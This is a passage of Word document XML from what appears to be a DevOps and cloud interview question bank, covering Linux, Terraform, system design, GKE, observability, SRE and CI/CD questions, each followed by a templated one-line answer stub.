        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Linux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check whether a port is open from another server?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q65. How do you measure network bandwidth between two Linux servers?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Linux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measure network bandwidth between two Linux servers?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q66. How does Terraform authenticate with cloud providers?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform</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Terraform authenticate with cloud providers?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q67. How does Terraform communicate with provider plugins?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform</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does Terraform communicate with provider plugins?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q68. Explain the Terraform workflow (init, plan, apply).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform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the Terraform workflow (init, plan, apply).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q69. Design a three-tier application with 3 web servers, 2 application servers, a database, and a load balancer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>System Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the System Design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Design a three-tier application with 3 web servers, 2 application servers, a database, and a load balancer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q70. Explain the deployment flow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>System Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the System Design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the deployment flow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q71. Explain the network flow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>System Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the System Design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the network flow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q72. Explain the security groups.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>System Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the System Design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the security groups.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q73. Explain the deployment pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>System Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the System Design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Explain the deployment pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 79 - GCP Platform, GKE Operations and AI/ML Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. Tell me about the most complex GCP environment you have owned or significantly contributed to.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GCP Architecture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Tell me about the most complex GCP environment you have owned or significantly contributed to.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. What was the overall architecture of that environment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GCP Architecture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was the overall architecture of that environment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. What GCP native services did you design around?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GCP Architecture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GCP native services did you design around?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. How did you handle multi-tenancy or isolation between teams or workloads?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GCP Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GCP Architecture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did you handle multi-tenancy or isolation between teams or workloads?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. Walk me through how you administered a production GKE cluster from initial setup through day-two operations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GKE/Kubernetes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Walk me through how you administered a production GKE cluster from initial setup through day-two operations.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. How did you handle node pool upgrades with zero or minimal downtime?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GKE/Kubernetes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did you handle node pool upgrades with zero or minimal downtime?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. What autoscaling strategy did you implement in GKE, and why?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GKE/Kubernetes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autoscaling strategy did you implement in GKE, and why?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Can you describe a time when a human error or workload caused a production issue?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GKE/Kubernetes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Can you describe a time when a human error or workload caused a production issue?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. How did you identify the root cause of that production issue?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GKE/Kubernetes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did you identify the root cause of that production issue?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. How did you resolve the issue?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GKE/Kubernetes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did you resolve the issue?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. What preventive measures did you implement to avoid similar incidents in the future?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>GKE/Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the GKE/Kubernetes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preventive measures did you implement to avoid similar incidents in the future?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. How did you manage networking within a Kubernetes cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes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did you manage networking within a Kubernetes cluster?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. How did you manage networking between multiple Kubernetes clusters?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Kubernetes Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Kubernetes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did you manage networking between multiple Kubernetes clusters?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. How did you implement end-to-end observability for production workloads?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability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did you implement end-to-end observability for production workloads?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. What metrics did you monitor?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability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metrics did you monitor?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. What logging strategy did you implement?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability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logging strategy did you implement?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q17. How did you implement distributed tracing?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Observability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Observability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did you implement distributed tracing?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q18. How do you define an SLI?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the SRE/Reliability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define an SLI?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q19. How do you define an SLO?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the SRE/Reliability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define an SLO?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q20. How do you define an SLA?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the SRE/Reliability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define an SLA?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q21. Give a concrete example of an SLA/SLO that you implemented.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SRE/Reliability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the SRE/Reliability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Give a concrete example of an SLA/SLO that you implemented.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q22. How did you build your CI/CD pipeline for infrastructure and applications?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/GitOps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did you build your CI/CD pipeline for infrastructure and applications?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q23. Walk me through the pipeline from developer commit to production deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/GitOps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Walk me through the pipeline from developer commit to production deployment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q24. What CI/CD tools did you use?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the CI/CD/GitOps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CI/CD tools did you use?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q25. How did you handle secrets and environment variables in the pipeline?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>CI/CD/GitOps</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
